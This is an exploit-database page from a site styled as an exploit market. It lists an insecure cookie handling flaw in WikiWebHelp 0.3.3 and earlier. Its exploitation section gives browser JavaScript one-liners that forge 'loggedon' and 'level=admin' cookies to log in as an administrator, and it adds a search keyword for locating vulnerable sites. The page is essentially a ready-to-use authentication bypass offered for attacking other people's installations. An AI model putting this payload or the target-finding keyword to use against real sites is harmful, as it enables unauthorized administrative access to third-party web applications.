[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability

Author
FuRty
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14505
Category
web applications
Date add
18-10-2010
Platform
php
===========================================================
WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability
===========================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : FuRty
[~] Contact : fir4t@fir4t.org
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : WikiWebHelp
~Version : 0.3.3
~Software: http://sourceforge.net/projects/wwh/
~Vendor : http://wikiwebhelp.org
~Vulnerability Style : Cookie Handling
~Google Keyword : Powered by WikiWebHelp
[~]Date : "17.10.2010"
-----------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
        ~~~~~~~~ Explotation ~~~~~~~~~~~
  
    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    Do not rush to primarily target the site, please register:)
 
    javascript:document.cookie="loggedon=[VictimNICK];path=/"; javascript:document.cookie="level=admin;path=/";
    ================================
          [+]  Cookie Browser Injected!
  
          [+]  Logged on 



#  0day.today [2024-11-15]  #